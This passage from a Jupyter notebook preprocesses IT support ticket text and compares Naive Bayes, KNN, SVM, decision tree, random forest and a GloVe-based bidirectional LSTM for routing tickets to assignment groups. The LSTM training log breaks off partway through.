                  "ma", "made", "mainly", "make", "makes", "many", "may", "maybe", "me", "meantime", "meanwhile", "merely", "mg", "might", "mightn",
                  "mill", "million", "mine", "miss", "ml", "mn", "mo", "more", "moreover", "most", "mostly", "move", "mr", "mrs", "ms", "mt", "mu", 
                  "much", "mug", "must", "mustn", "my", "n", "N", "n2", "na", "name", "namely", "nay", "nc", "nd", "ne", "near", "nearly", "necessarily", 
                  "neither", "nevertheless", "new", "next", "ng", "ni", "nine", "ninety", "nj", "nl", "nn", "nobody", "non", "none", "nonetheless", "noone",
                  "normally", "nos", "noted", "novel", "now", "nowhere", "nr", "ns", "nt", "ny", "o", "O", "oa", "ob", "obtain", "obtained", "obviously",
                  "oc", "od", "of", "off", "often", "og", "oh", "oi", "oj", "ok", "okay", "ol", "old", "om", "omitted", "on", "once", "one", "ones", 
                  "only", "onto", "oo", "op", "oq", "or", "ord", "os", "ot", "otherwise", "ou", "ought", "our", "out", "outside", "over", "overall",
                  "ow", "owing", "own", "ox", "oz", "p", "P", "p1", "p2", "p3", "page", "pagecount", "pages", "par", "part", "particular", "particularly", 
                  "pas", "past", "pc", "pd", "pe", "per", "perhaps", "pf", "ph", "pi", "pj", "pk", "pl", "placed", "please", "plus", "pm", "pn", "po",
                  "poorly", "pp", "pq", "pr", "predominantly", "presumably", "previously", "primarily", "probably", "promptly", "proud", "provides", "ps", 
                  "pt", "pu", "put", "py", "q", "Q", "qj", "qu", "que", "quickly", "quite", "qv", "r", "R", "r2", "ra", "ran", "rather", "rc", "rd", "re", 
                  "readily", "really", "reasonably", "recent", "recently", "ref", "refs", "regarding", "regardless", "regards", "related", "relatively",
                  "research", "respectively", "resulted", "resulting", "results", "rf", "rh", "ri", "right", "rj", "rl", "rm", "rn", "ro", "rq",
                  "rr", "rs", "rt", "ru", "run", "rv", "ry", "s", "S", "s2", "sa", "said", "saw", "say", "saying", "says", "sc", "sd", "se", "sec", "second",
                  "secondly", "section", "seem", "seemed", "seeming", "seems", "seen", "sent", "seven", "several", "sf", "shall", "shan", "shed", "shes", 
                  "show", "showed", "shown", "showns", "shows", "si", "side", "since", "sincere", "six", "sixty", "sj", "sl", "slightly", "sm", "sn", "so", 
                  "some", "somehow", "somethan", "sometime", "sometimes", "somewhat", "somewhere", "soon", "sorry", "sp", "specifically", "specified", 
                  "specify", "specifying", "sq", "sr", "ss", "st", "still", "stop", "strongly", "sub", "substantially", "successfully", "such", 
                  "sufficiently", "suggest", "sup", "sure", "sy", "sz", "t", "T", "t1", "t2", "t3", "take", "taken", "taking", "tb", "tc", "td", "te",
                  "tell", "ten", "tends", "tf", "th", "than", "thank", "thanks", "thanx", "that", "thats", "the", "their", "theirs", "them", "themselves",
                  "then", "thence", "there", "thereafter", "thereby", "thered", "therefore", "therein", "thereof", "therere", "theres", "thereto", 
                  "thereupon", "these", "they", "theyd", "theyre", "thickv", "thin", "think", "third", "this", "thorough", "thoroughly", "those", "thou",
                  "though", "thoughh", "thousand", "three", "throug", "through", "throughout", "thru", "thus", "ti", "til", "tip", "tj", "tl", "tm", "tn", 
                  "to", "together", "too", "took", "top", "toward", "towards", "tp", "tq", "tr", "tried", "tries", "truly", "try", "trying", "ts", "tt",
                  "tv", "twelve", "twenty", "twice", "two", "tx", "u", "U", "u201d", "ue", "ui", "uj", "uk", "um", "un", "under", "unfortunately", "unless",
                  "unlike", "unlikely", "until", "unto", "uo", "up", "upon", "ups", "ur", "us", "used", "useful", "usefully", "usefulness", "using",
                  "usually", "ut", "v", "V", "va", "various", "vd", "ve", "very", "via", "viz", "vj", "vo", "vol", "vols", "volumtype", "vq", "vs", "vt", 
                  "vu", "w", "W", "wa", "was", "wasn", "wasnt", "way", "we", "wed", "welcome", "well", "well-b", "went", "were", "weren", "werent", "what", 
                  "whatever", "whats", "when", "whence", "whenever", "where", "whereafter", "whereas", "whereby", "wherein", "wheres", "whereupon", 
                  "wherever", "whether", "which", "while", "whim", "whither", "who", "whod", "whoever", "whole", "whom", "whomever", "whos", "whose",
                  "why", "wi", "widely", "with", "within", "without", "wo", "won", "wonder", "wont", "would", "wouldn", "wouldnt", "www", "x", "X", 
                  "x1", "x2", "x3", "xf", "xi", "xj", "xk", "xl", "xn", "xo", "xs", "xt", "xv", "xx", "y", "Y", "y2", "yes", "yet", "yj", "yl", "you",
                  "youd", "your", "youre", "yours", "yr", "ys", "yt", "z", "Z", "zero", "zi", "zz"])
def remove_stopwords(text):
    """custom function to remove the stopwords"""
    return " ".join([word for word in str(text).split() if word not in STOPWORDS])

tickets_corpus["ticket_summary"] = tickets_corpus["ticket_summary"].apply(lambda text: remove_stopwords(text))

tickets_corpus["ticket_summary"].head(10)
Out[17]:
0    login issue verified user detailsemployee mana...
1    outlook teammy meetingsskype meetings appearin...
2                  cant log vpn hii cannot log vpnbest
3            unable access hrtool unable access hrtool
4                              skype error skype error
5    unable log engineering tool skype unable log e...
6    event criticalhostnamecompanycom value mountpo...
7    ticketno employment status nonemployee enter u...
8    unable disable add ins outlook unable disable ...
9                        update inplant update inplant
Name: ticket_summary, dtype: object

Convert Accented Characters
Words with accent marks like “latté” and “café” can be converted and standardized to just “latte” and “cafe”, else our NLP model will treat “latté” and “latte” as different words even though they are referring to same thing. To do this, we use the module unidecode.

In [0]:
def remove_accented_chars(text):
    """remove accented characters from text, e.g. café"""
    text = unidecode.unidecode(text)
    return text
In [19]:
tickets_corpus['ticket_summary'] = tickets_corpus["ticket_summary"].apply(lambda text: remove_accented_chars(text))

tickets_corpus['ticket_summary'].head(10)
Out[19]:
0    login issue verified user detailsemployee mana...
1    outlook teammy meetingsskype meetings appearin...
2                  cant log vpn hii cannot log vpnbest
3            unable access hrtool unable access hrtool
4                              skype error skype error
5    unable log engineering tool skype unable log e...
6    event criticalhostnamecompanycom value mountpo...
7    ticketno employment status nonemployee enter u...
8    unable disable add ins outlook unable disable ...
9                        update inplant update inplant
Name: ticket_summary, dtype: object

Lemmatization

Lemmatization is the process of converting a word to its base form, e.g., “caring” to “care”. We use spaCy’s lemmatizer to obtain the lemma, or base form, of the words.

In [0]:
import en_core_web_sm
nlp = en_core_web_sm.load()
#nlp = spacy.load('en_core_web_md')
In [0]:
#  function to lemmatize the descriptions
def lemmatize(sentence):
    spacy_doc = nlp(sentence) # Parse the sentence using the loaded 'en' model object `nlp`
    return " ".join([token.lemma_ for token in spacy_doc if token.lemma_ !='-PRON-'])
In [0]:
# Apply the Lemmatization to ticket_summary
tickets_corpus['ticket_Desc_lemm'] = tickets_corpus['ticket_summary'].apply(lemmatize)
In [23]:
# Verify the data after lemmatization
tickets_corpus['ticket_Desc_lemm'].tail(10)
Out[23]:
8490    check status purchase contact pasgryowski pasg...
8491    vpn laptop need vpn laptop llvknethyen grechdu...
8492    hrtool etime option visitble hrtool etime opti...
8493    account account need copy problem error someon...
8494    tablet need reimage multiple issue crm wifi ta...
8495    email come mail afternooni receive email mailp...
8496      telephonysoftware issue telephonysoftware issue
8497    windows password reset tifpdchb pedxruyf windo...
8498    machine funcionando unable access machine util...
8499    mehreren pcs lassen sich verschiedene prgramdn...
Name: ticket_Desc_lemm, dtype: object

WordCloud

wordcloud is another helpful visualization tool.Wordcloud package helps to create word clouds by placing words on a canvas randomly, with sizes proportional to their frequency in the text.

Let's visualize the frequent words in all tickets assigned to GRP_0

In [0]:
text = (tickets_corpus[tickets_corpus['Assignment group'] == 'GRP_0']['ticket_Desc_lemm']).to_string(index=False)
wordcloud = WordCloud().generate(text)
# plot the WordCloud image                        
plt.figure(figsize = (15, 12), facecolor = None) 
plt.imshow(wordcloud, interpolation='bilinear')
plt.axis("off")
plt.show()

As we can see from the above wordcloud, most of the tickets are related to 'Password reset', 'account lock', "outlook issues', "unable to login","internet access", "email issues","skype issues" etc.

Wordcloud to visualize the frequent words in all tickets of all the groups.

In [0]:
text = (tickets_corpus['ticket_Desc_lemm']).to_string(index=False)
wordcloud = WordCloud().generate(text)
# plot the WordCloud image                        
plt.figure(figsize = (15, 12), facecolor = None) 
plt.imshow(wordcloud, interpolation='bilinear')
plt.axis("off")
plt.show()

As we can see, If we look at the ticket descriptions overall, most of the tickets are for job scheduler fail, password reset, account lock,circuit issues etc

As we have done with our all preprocessing steps, lets move further to create the model.First lets experiment with some of the classifier algorithms and see the performance.

Deciding Models and Model Building

Overview of this step:

  • Building a model architecture which can classify.

  • Trying different model architectures by researching state of the art for similar tasks.

  • Train the model

  • To deal with large training time, save the weights so that you can use them when training the model for the second time without starting from scratch.

Lets experiment with different algorithms such as:

  • Multinomial Naive Bayes

  • K Nearest neighbor

  • Support Vector Machine

  • Decission Tree

  • Random Forest

  • LSTM

Representing the raw text data as numerical data by doing vectorization

The raw data, a sequence of symbols cannot be fed directly to the algorithms themselves as most of them expect numerical feature vectors with a fixed size rather than the raw text documents with variable length. Before creating the above classifier models, let's first vectorize our inpur data.
Scikit-learn's CountVectorizer is used to transform a corpora of text to a vector of term / token counts. It also provides the capability to preprocess your text data prior to generating the vector representation making it a highly flexible feature representation module for text.

TF-IDF or Term Frequency(TF) — Inverse Dense Frequency(IDF) is a technique which is used to find meaning of sentences consisting of words and cancels out the incapabilities of Bag of Words technique which is good for text classification or for helping a machine read words in numbers. Lets use this for running our base classification models. In text analysis with machine learning, TF-IDF algorithms help sort data into categories, as well as extract keywords. This means that simple, monotonous tasks, like tagging support tickets or rows of feedback and inputting data can be done in seconds.

In [0]:
X_train, X_test, y_train, y_test = train_test_split(tickets_corpus['ticket_Desc_lemm'], tickets_corpus['Assignment group'], random_state = 0)
count_vect = CountVectorizer()
X_train_counts = count_vect.fit_transform(X_train)

tfidf_transformer = TfidfTransformer()
X_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)
In [0]:
X_train.shape,y_train.shape,X_test.shape,y_test.shape
Out[0]:
((6368,), (6368,), (2123,), (2123,))

Lets run and compare different models!

The below classifiers are run and compared:
--Multinomial Naive Bayes
--K Nearest neighbor
--Support Vector Machine
--Decission Tree
--Random Forest
--LSTM

Multinomial Naive Bayes

Naive Bayes is a family of algorithms based on applying Bayes theorem with a strong(naive) assumption, that every feature is independent of the others, in order to predict the category of a given sample. They are probabilistic classifiers, therefore will calculate the probability of each category using Bayes theorem, and the category with the highest probability will be output. Naive Bayes classifiers have been successfully applied to many domains, particularly NLP.
Advantages:

  • It is very simple and easy to implement
  • It works very well with text data
  • Comparatively faster considering to other algorithms

Disadvantages:

  • This classifier makes a very strong assumption on the shape of your data distribution, i.e. any two features are independent given the output class.
  • Another disadvantage is due to data scarcity. For any possible value in feature space, a likelihood value must be estimated by a frequentist
In [0]:
clf = MultinomialNB().fit(X_train_tfidf, y_train)
y_train_pred_NB = clf.predict(count_vect.transform(X_train))
y_test_pred_NB = clf.predict(count_vect.transform(X_test))
print("Multinomial NaiveBayers :")
print('Training accuracy: %.2f%%' % (accuracy_score(y_train,y_train_pred_NB) * 100))
print('Testing accuracy: %.2f%%' % (accuracy_score(y_test, y_test_pred_NB) * 100))
Multinomial NaiveBayers :
Training accuracy: 62.52%
Testing accuracy: 61.28%

K Nearest Neighbor
KNN is a non-parametric and lazy learning algorithm. Non-parametric means there is no assumption for underlying data distribution.This will be very helpful in practice where most of the real world datasets do not follow mathematical theoretical assumptions.Lazy algorithm means it does not need any training data points for model generation. All training data used in the testing phase.

Advantages:

  • The training phase of K-nearest neighbor classification is much faster compared to other classification algorithms. There is no need to train a model for generalization, That is why KNN is known as the simple and instance-based learning algorithm.

Disadvantages:

  • The testing phase of K-nearest neighbor classification is slower and costlier in terms of time and memory. It requires large memory for storing the entire training dataset for prediction.
  • KNN requires scaling of data because KNN uses the Euclidean distance between two data points to find nearest neighbors. Euclidean distance is sensitive to magnitudes. The features with high magnitudes will weight more than features with low magnitudes. KNN also not suitable for large dimensional data.
In [0]:
clf_knn = KNeighborsClassifier(n_neighbors=7,weights='uniform').fit(X_train_tfidf, y_train)
y_train_pred_knn = clf_knn.predict(count_vect.transform(X_train))
y_test_pred_knn = clf_knn.predict(count_vect.transform(X_test))
print("K Nearest Neighbours :")
print('Training accuracy: %.2f%%' % (accuracy_score(y_train,y_train_pred_knn) * 100))
print('Testing accuracy: %.2f%%' % (accuracy_score(y_test, y_test_pred_knn) * 100))
K Nearest Neighbours :
Training accuracy: 66.83%
Testing accuracy: 64.72%

Support Vector Machine
SVM (Support Vector Machine) classifies the data using hyperplane which acts like a decision boundary between different classes. Extreme data points from each class are called Support Vectors. SVM tries to find the best and optimal hyperplane which has maximum margin from each Support Vector. Support vectors are the data points, which are closest to the hyperplane. These points will define the separating line better by calculating margins.
The linear kernel is often recommended for text classification.
Advantages:

  • SVM Classifiers offer good accuracy and perform faster prediction compared to Naïve Bayes algorithm.
  • They use less memory because they use a subset of training points in the decision phase. SVM works well with a clear margin of separation and with high dimensional space.

Disadvantages:

  • SVM is not suitable for large datasets because of its high training time and it also takes more time in training compared to Naïve Bayes.
  • It works poorly with overlapping classes and is also sensitive to the type of kernel used.
In [0]:
clf_svc = LinearSVC().fit(X_train_tfidf, y_train)
y_train_pred_svc = clf_svc.predict(count_vect.transform(X_train))
y_test_pred_svc = clf_svc.predict(count_vect.transform(X_test))
print("Support Vector Machine :")
print('Training accuracy: %.2f%%' % (accuracy_score(y_train,y_train_pred_svc) * 100))
print('Testing accuracy: %.2f%%' % (accuracy_score(y_test, y_test_pred_svc) * 100))
Support Vector Machine :
Training accuracy: 91.32%
Testing accuracy: 67.73%

Decision Tree

A decision tree is a flowchart-like tree structure where an internal node represents feature(or attribute), the branch represents a decision rule, and each leaf node represents the outcome.The topmost node in a decision tree is known as the root node. It learns to partition on the basis of the attribute value. It partitions the tree in recursively manner call recursive partitioning. This flowchart-like structure helps you in decision making. It's visualization like a flowchart diagram which easily mimics the human level thinking. That is why decision trees are easy to understand and interpret.

Advantages:

  • Decision Tree is one of the easiest and popular classification algorithms to understand and interpret.
  • It can easily capture Non-linear patterns.
  • It requires fewer data preprocessing from the user, for example, there is no need to normalize columns.
  • It can be used for feature engineering such as predicting missing values, suitable for variable selection.
  • The decision tree has no assumptions about distribution because of the non-parametric nature of the algorithm.

Disadvantages:

  • Sensitive to noisy data. It can overfit noisy data.
  • The small variation(or variance) in data can result in the different decision tree. This can be reduced by bagging and boosting algorithms.
  • Decision trees are biased with imbalance dataset, so it is recommended that balance out the dataset before creating the decision tree.
In [0]:
clf_tree = DecisionTreeClassifier().fit(X_train_tfidf, y_train)
y_train_pred_tree = clf_tree.predict(count_vect.transform(X_train))
y_test_pred_tree = clf_tree.predict(count_vect.transform(X_test))
print("Decision Tree Classifier :")
print('Training accuracy: %.2f%%' % (accuracy_score(y_train,y_train_pred_tree) * 100))
print('Testing accuracy: %.2f%%' % (accuracy_score(y_test, y_test_pred_tree) * 100))
Decision Tree Classifier :
Training accuracy: 63.63%
Testing accuracy: 51.06%

RandomForest Classifier

Due to its algorithmic simplicity and prominent classification performance for high dimensional data, random forest has become a promising method for text categorization. Random forest is a popular classification method which is an ensemble of a set of classification trees.

Advantages:

  • Random forests is considered as a highly accurate and robust method because of the number of decision trees participating in the process.
  • It does not suffer from the overfitting problem. The main reason is that it takes the average of all the predictions, which cancels out the biases.
  • You can get the relative feature importance, which helps in selecting the most contributing features for the classifier.

Disadvantages:

  • Random forests is slow in generating predictions because it has multiple decision trees. Whenever it makes a prediction, all the trees in the forest have to make a prediction for the same given input and then perform voting on it. This whole process is time-consuming.
  • The model is difficult to interpret compared to a decision tree, where you can easily make a decision by following the path in the tree.
In [0]:
clf_rand = RandomForestClassifier(n_estimators=100).fit(X_train_tfidf, y_train)
y_train_pred_rand = clf_rand.predict(count_vect.transform(X_train))
y_test_pred_rand = clf_rand.predict(count_vect.transform(X_test))
print("RandomForest Classifier:")
print('Training accuracy: %.2f%%' % (accuracy_score(y_train,y_train_pred_rand) * 100))
print('Testing accuracy: %.2f%%' % (accuracy_score(y_test, y_test_pred_rand) * 100))
RandomForest Classifier:
Training accuracy: 83.79%
Testing accuracy: 63.87%

Comparing Classification Models
The 10-fold cross validation procedure is used to evaluate each algorithm, importantly configured with the same random seed to ensure that the same splits to the training data are performed and that each algorithms is evaluated in precisely the same way.Each algorithm is given a short name, useful for summarizing results afterward.

In [0]:
# Comparing models
models = []
models.append(('MNB', MultinomialNB()))
models.append(('KNN', KNeighborsClassifier(n_neighbors=7)))
models.append(('CART', DecisionTreeClassifier()))
models.append(('RFC', RandomForestClassifier(n_estimators=100)))
models.append(('SVM', LinearSVC()))
# evaluate each model in turn
results = []
names = []
scoring = 'accuracy'
for name, model in models:
	kfold = model_selection.KFold(n_splits=10)
	cv_results = model_selection.cross_val_score(model, X_train_tfidf, y_train, cv=kfold, scoring=scoring)
	results.append(cv_results)
	names.append(name)
	msg = "%s: %f (%f)" % (name, cv_results.mean(), cv_results.std())
	print(msg)
MNB: 0.543182 (0.021248)
KNN: 0.335890 (0.023843)
CART: 0.582286 (0.014853)
RFC: 0.639289 (0.015696)
SVM: 0.670850 (0.022778)

Boxplot algorithm comparison

In [0]:
fig = plt.figure()
fig.suptitle('Algorithm Comparison')
ax = fig.add_subplot(111)
plt.boxplot(results)
ax.set_xticklabels(names)
plt.show()

LSTM Model

LSTM stands for Long short-term memory. An LSTM module (or cell) has 5 essential components which allows it to model both long-term and short-term data.LSTM is a special type of RNN that preserves long term dependency in a more effective way compared to the basic RNNs. This is particularly useful to overcome vanishing gradient problem as LSTM uses multiple gates to carefully regulate the amount of information that will be allowed into each node state.LSTM in its core, preserves information from inputs that has already passed through it using the hidden state.Unidirectional LSTM only preserves information of the past because the only inputs it has seen are from the past.

Advantages:

  • LSTM can handle noise, distributed representations, and continous values.
  • The constant error backpropagation with memory cells results in LSTM's ability to bridge very long time lags.

We are using the bidirectional LSTM neural network for the classification.Bidirectional LSTMs are an extension of traditional LSTMs that can improve model performance on sequence classification problems.Bidirectional LSTMs train two instead of one LSTMs on the input sequence. The first on the input sequence as-is and the second on a reversed copy of the input sequence. This can provide additional context to the network and result in faster and even fuller learning on the problem

Creating Tokens using Keras Tokenizer class.

In [0]:
texts = tickets_corpus['ticket_Desc_lemm'].values
tokenizer = Tokenizer()
tokenizer.fit_on_texts(texts)
tickets_corpus['token_text_vocab'] = tokenizer.texts_to_sequences(texts)
In [26]:
vocab_words = tokenizer.word_index.items()
len(vocab_words)
Out[26]:
17822
In [27]:
#Get the vocabulary size
num_words = len(tokenizer.word_index) +1
print (num_words)
17823
In [28]:
#To view the 10 elements from dictionary
from itertools import islice
def take(n, iterable):
    "Return first n items of the iterable as a list"
    return list(islice(iterable, n))

take(10, vocab_words)
Out[28]:
[('job', 1),
 ('password', 2),
 ('jobscheduler', 3),
 ('fail', 4),
 ('yesnona', 5),
 ('reset', 6),
 ('unable', 7),
 ('user', 8),
 ('account', 9),
 ('issue', 10)]
In [0]:
maxlen=300
max_features = 10000
In [0]:
X = tokenizer.texts_to_sequences(tickets_corpus['ticket_Desc_lemm'])
X = pad_sequences(X, padding='post',maxlen = maxlen)
# Converting categorical labels to numbers.
y = pd.get_dummies(tickets_corpus['Assignment group']).values
In [31]:
print("Number of Samples:", len(X))
print("Number of Labels: ", len(y))
Number of Samples: 8491
Number of Labels:  8491
In [32]:
print("X[0] = ",X[0])
print("y[0] = ",y[0])
X[0] =  [  20   10  140    8  487   74  722    8    6 1339    8   20  642  126
  318   84    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0    0    0    0    0    0    0    0    0
    0    0    0    0    0    0]
y[0] =  [1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]

Get embedding using the pre-trained model Glove

GloVe is an unsupervised learning algorithm for obtaining vector representations for words. Training is performed on aggregated global word-word co-occurrence statistics from a corpus, and the resulting representations showcase interesting linear substructures of the word vector space.
The advantage of GloVe is that, unlike Word2vec, GloVe does not rely just on local statistics (local context information of words), but incorporates global statistics (word co-occurrence) to obtain word vectors. Here we are using 'glove.6B.200d.txt' file which is trained on a corpus of 6 billion tokens and contains a vocabulary of 400 thousand tokens.

In [0]:
glove_file = project_path + "glove.6B.zip"
#Extract Glove embedding zip file
from zipfile import ZipFile
with ZipFile(glove_file, 'r') as z:
    z.extractall()
In [0]:
#Get the Word Embeddings using Embedding file
EMBEDDING_FILE = './glove.6B.200d.txt'
embeddings = {}
for o in open(EMBEDDING_FILE, encoding="utf8",errors='ignore'):
    word = o.split(" ")[0]
    embd = o.split(" ")[1:]
    embd = np.asarray(embd, dtype='float32')
    embeddings[word] = embd
In [35]:
len(embeddings.values())
Out[35]:
400000
In [36]:
#Just checking the sample embeddings for the word 'outlook' which is from our corpus
embeddings['outlook']
Out[36]:
array([ 0.25253  ,  0.30753  ,  0.54159  ,  0.0085215,  0.36576  ,
       -0.38342  , -0.002875 , -0.65564  ,  0.55872  ,  0.54463  ,
        0.5221   ,  0.67832  , -0.044136 , -0.45919  ,  1.3775   ,
        0.54288  , -0.05421  ,  0.36371  , -0.059071 , -0.56022  ,
        0.63958  ,  1.5561   , -0.75875  , -0.24567  , -0.099208 ,
        0.32084  , -0.31637  ,  0.51132  , -0.75753  , -0.008595 ,
       -0.47135  , -0.28668  , -0.76088  ,  0.089982 ,  0.82554  ,
       -0.44267  ,  0.017712 , -0.12609  , -0.35306  ,  0.58798  ,
       -0.079643 , -0.09144  , -0.69428  ,  0.7141   ,  0.098986 ,
       -0.15905  ,  0.20222  , -0.26678  , -0.71632  ,  0.14216  ,
       -0.35488  ,  0.66125  ,  0.13997  , -0.36635  , -0.65228  ,
        0.017395 , -0.28262  , -0.62002  , -0.10768  , -0.63378  ,
        0.36728  , -0.25112  , -0.0050054, -0.12513  ,  0.071162 ,
        0.25933  ,  0.46956  ,  0.41959  ,  0.38161  ,  0.33574  ,
        1.2079   ,  1.0156   , -0.33064  ,  0.049285 ,  0.64799  ,
        0.9032   , -0.587    ,  0.25595  ,  0.29019  , -0.0061144,
       -0.45957  , -0.26611  ,  0.059308 , -0.06971  , -0.16595  ,
        0.59065  ,  0.0090039, -0.57622  ,  0.86851  , -0.38368  ,
        0.30883  , -0.05237  , -0.26891  , -0.3987   ,  0.4258   ,
       -0.0058687,  0.3917   ,  0.42049  ,  0.42059  , -0.0024515,
        0.6651   , -0.25653  ,  0.080253 ,  0.5668   ,  0.35346  ,
        1.0897   , -0.34318  , -0.23431  , -0.79204  , -0.35176  ,
       -0.85527  , -0.47728  , -0.14454  ,  0.1258   , -0.19847  ,
       -0.039717 , -0.078726 ,  0.86994  ,  0.11046  , -0.27259  ,
       -0.15248  ,  0.52501  , -0.2717   , -0.37977  ,  0.39708  ,
        0.81965  ,  0.23226  ,  0.4044   , -0.27105  ,  0.39648  ,
        0.057228 , -0.64164  ,  0.28283  ,  0.42194  ,  0.22285  ,
        0.12988  , -0.087625 , -0.57367  ,  0.37229  , -0.33213  ,
       -0.21673  , -0.64303  , -0.20908  , -0.043258 ,  0.90489  ,
        0.43744  ,  0.33794  , -0.69327  ,  0.57952  ,  0.49073  ,
        0.11257  , -0.16302  ,  1.0284   ,  0.31557  ,  0.55558  ,
       -0.13495  ,  0.37668  , -0.013302 ,  0.20188  , -0.7454   ,
        0.25698  , -0.10063  ,  0.079199 ,  0.21338  , -0.48479  ,
        0.40839  ,  0.023516 , -0.65855  , -0.4337   ,  0.016852 ,
        0.70003  ,  0.33642  ,  0.40711  , -0.16604  , -0.84361  ,
        0.99976  ,  0.032356 ,  1.0198   , -0.096587 ,  0.42429  ,
        0.77981  ,  0.59161  ,  0.60366  ,  0.33701  ,  0.62386  ,
        0.12845  ,  0.37194  ,  0.18745  ,  0.35197  ,  0.15476  ,
        0.32751  , -0.39124  , -0.35793  , -0.039009 ,  0.43541  ,
       -0.76051  ,  0.21811  ,  0.0029949,  0.55254  ,  0.93586  ],
      dtype=float32)

It is 200 dimension word embedding for the word 'outlook'

In [0]:
#Create a weight matrix for words in training docs
embedding_matrix = np.zeros((num_words, 200))

for word, i in tokenizer.word_index.items():
    embedding_vector = embeddings.get(word)
    if embedding_vector is not None:
        embedding_matrix[i] = embedding_vector

we have created the embedding vector for all the words in our vocabulary.

After all the above data transformation, now that we have all the features and labels, it is time to train the classifiers. There are a number of algorithms we can use for this type of problem.

Split the dataset for training and testing

In [38]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)
X_train.shape, X_test.shape, y_train.shape, y_test.shape
Out[38]:
((6792, 300), (1699, 300), (6792, 74), (1699, 74))

Now lets Create the LSTM model.(Bidirectional)

Using bidirectional will run your inputs in two ways, one from past to future and one from future to past and what differs this approach from unidirectional is that in the LSTM that runs backwards you preserve information from the future and using the two hidden states combined you are able in any point in time to preserve information from both past and future.

In [0]:
#parameters used
epochs = 20
batch_size = 60
embedding_size = 200
In [0]:
model = Sequential()
model.add(Embedding(input_dim=num_words, 
                        output_dim=embedding_size, 
                        weights=[embedding_matrix], 
                        input_length=maxlen, 
#                       mask_zero=True,
                        trainable=False))
model.add(SpatialDropout1D(0.2))
model.add(Bidirectional(LSTM(100, dropout=0.2, recurrent_dropout=0.2)))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.1))
model.add(Dense(74, activation='softmax'))
In [0]:
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
In [0]:
### save the model so that you can use them again
output_dir = 'model_output/LSTM'

modelcheckpoint = ModelCheckpoint(filepath=output_dir+"/weights.{epoch:02d}.hdf5")
if not os.path.exists(output_dir):
    os.makedirs(output_dir)
In [0]:
history = model.fit(X_train, 
                    y_train, 
                    epochs=epochs, 
                    batch_size=batch_size,
                    validation_data=(X_test, y_test),
                    callbacks=[modelcheckpoint,EarlyStopping(monitor='val_loss', patience=3, min_delta=0.0001)])
Train on 6792 samples, validate on 1699 samples
Epoch 1/20
6792/6792 [==============================] - 115s 17ms/sample - loss: 2.4723 - accuracy: 0.5012 - val_loss: 2.0099 - val_accuracy: 0.5438
Epoch 2/20
6792/6792 [==============================] - 108s 16ms/sample - loss: 1.8889 - accuracy: 0.5499 - val_loss: 1.8021 - val_accuracy: 0.5768
Epoch 3/20
6792/6792 [==============================] - 106s 16ms/sample - loss: 1.7132 - accuracy: 0.5727 - val_loss: 1.6883 - val_accuracy: 0.5939
Epoch 4/20
6792/6792 [==============================] - 106s 16ms/sample - loss: 1.6091 - accuracy: 0.5910 - val_loss: 1.6163 - val_accuracy: 0.6015
Epoch 5/20
6792/6792 [==============================] - 107s 16ms/sample - loss: 1.5309 - accuracy: 0.5942 - val_loss: 1.5692 - val_accuracy: 0.6098
Epoch 6/20
6792/6792 [==============================] - 107s 16ms/sample - loss: 1.4642 - accuracy: 0.6029 - val_loss: 1.5301 - val_accuracy: 0.6151
Epoch 7/20
6792/6792 [==============================] - 114s 17ms/sample - loss: 1.4014 - accuracy: 0.6110 - val_loss: 1.5225 - val_accuracy: 0.6104
Epoch 8/20
6792/6792 [==============================] - 108s 16ms/sample - loss: 1.3446 - accuracy: 0.6260 - val_loss: 1.4829 - val_accuracy: 0.6204
Epoch 9/20
6792/6792 [==============================] - 106s 16ms/sample - loss: 1.2982 - accuracy: 0.6352 - val_loss: 1.4755 - val_accuracy: 0.6215
Epoch 10/20
6792/6792 [==============================] - 108s 16ms/sample - loss: 1.2471 - accuracy: 0.6450 - val_loss: 1.4589 - val_accuracy: 0.6192
Epoch 11/20
6792/6792 [==============================] - 111s 16ms/sample - loss: 1.2131 - accuracy: 0.6477 - val_loss: 1.4424 - val_accuracy: 0.6221
Epoch 12/20
6792/6792 [==============================] - 105s 15ms/sample - loss: 1.1730 - accuracy: 0.6578 - val_loss: 1.4290 - val_accuracy: 0.6327
Epoch 13/20
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.1396 - accuracy: 0.6575 - val_loss: 1.4305 - val_accuracy: 0.6245
Epoch 14/20
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.0970 - accuracy: 0.6755 - val_loss: 1.4391 - val_accuracy: 0.6204
Epoch 15/20
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.1114 - accuracy: 0.6690 - val_loss: 1.4261 - val_accuracy: 0.6304
Epoch 16/20
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.0504 - accuracy: 0.6864 - val_loss: 1.4270 - val_accuracy: 0.6368
Epoch 17/20
6792/6792 [==============================] - 103s 15ms/sample - loss: 1.0136 - accuracy: 0.6927 - val_loss: 1.4460 - val_accuracy: 0.6280
Epoch 18/20
